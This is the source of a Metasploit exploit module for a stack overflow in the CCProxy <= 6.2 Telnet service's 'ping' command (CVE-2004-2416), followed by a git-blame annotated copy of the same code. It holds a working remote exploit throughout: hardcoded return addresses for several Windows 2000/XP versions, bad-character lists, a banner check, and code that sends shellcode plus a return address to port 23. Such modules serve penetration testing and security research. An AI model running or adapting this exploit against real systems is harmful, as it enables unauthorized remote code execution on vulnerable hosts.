modules/exploits/windows/proxy/ccproxy_telnet_ping.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'CCProxy Telnet Proxy Ping Overflow',
      'Description'	=> %q{
          This module exploits the YoungZSoft CCProxy <= v6.2 suite
        Telnet service. The stack is overwritten when sending an overly
        long address to the 'ping' command.
      },
      'Author' 	=> [ 'aushack' ],
      'Arch'		=> [ ARCH_X86 ],
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          [ 'CVE', '2004-2416' ],
          [ 'OSVDB', '11593' ],
          [ 'BID', '11666' ],
          [ 'EDB', '621' ],
        ],
      'Privileged'		=> false,
      'DefaultOptions'	=>
        {
          'EXITFUNC' 	=> 'thread',
        },
      'Payload' =>
        {
          'Space'		=> 1012,
          'BadChars' 	=> "\x00\x07\x08\x0a\x0d\x20",
        },
      'Platform' => ['win'],
      'Targets' =>
        [
          # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
          [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
          [ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
          [ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
          [ 'Windows XP SP2 - English',	    { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
        ],
      'DisclosureDate' => '2004-11-11'))

    register_options(
      [
        Opt::RPORT(23),
      ])
  end

  def check
    connect
    banner = sock.get_once || ''
    disconnect

    if banner.to_s =~ /CCProxy Telnet Service Ready/
      return Exploit::CheckCode::Detected
    end
      return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
    sock.put(sploit + "\r\n")

    handler
    disconnect
  end
end
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
Various module cleanups 2010-02-15 00:48:03 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00
Various module cleanups 2010-02-15 00:48:03 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
Add last chunk of fixes 2014-03-11 12:44:34 -05:00			`'Name' => 'CCProxy Telnet Proxy Ping Overflow',`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits the YoungZSoft CCProxy <= v6.2 suite`
			`Telnet service. The stack is overwritten when sending an overly`
			`long address to the 'ping' command.`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`},`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`'Author' => [ 'aushack' ],`
Various module cleanups 2010-02-15 00:48:03 +00:00			`'Arch' => [ ARCH_X86 ],`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[`
			`[ 'CVE', '2004-2416' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '11593' ],`
Fixes #5414 by applying Joshua Taylor's patch that corrects bad reference types 2011-10-16 09:53:53 +00:00			`[ 'BID', '11666' ],`
Update milw0rm references. 2012-06-28 14:27:12 -05:00			`[ 'EDB', '621' ],`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`],`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`'Privileged' => false,`
			`'DefaultOptions' =>`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`{`
			`'EXITFUNC' => 'thread',`
			`},`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`'Payload' =>`
Various module cleanups 2010-02-15 00:48:03 +00:00			`{`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`'Space' => 1012,`
			`'BadChars' => "\x00\x07\x08\x0a\x0d\x20",`
			`},`
			`'Platform' => ['win'],`
			`'Targets' =>`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[`
			`# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.`
			`[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll`
			`[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll`
			`[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll`
			`[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll`
			`[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2004-11-11'))`
Various module cleanups 2010-02-15 00:48:03 +00:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`[`
			`Opt::RPORT(23),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`end`

Various module cleanups 2010-02-15 00:48:03 +00:00			`def check`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`connect`
Fix bad copypast, sock.get usage, HTTP mistakes 2014-06-28 16:18:16 -05:00			`banner = sock.get_once \|\| ''`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`disconnect`

Fix bad copypast, sock.get usage, HTTP mistakes 2014-06-28 16:18:16 -05:00			`if banner.to_s =~ /CCProxy Telnet Service Ready/`
Update exploit checks 2014-01-20 14:26:10 -06:00			`return Exploit::CheckCode::Detected`
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`end`
			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
			`connect`
Various module cleanups 2010-02-15 00:48:03 +00:00
New module from Patrick Webster 2007-09-09 22:39:55 +00:00			`sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)`
			`sock.put(sploit + "\r\n")`

			`handler`
			`disconnect`
			`end`
osvdb references from Steve Tornio 2009-05-19 13:20:32 +00:00			`end`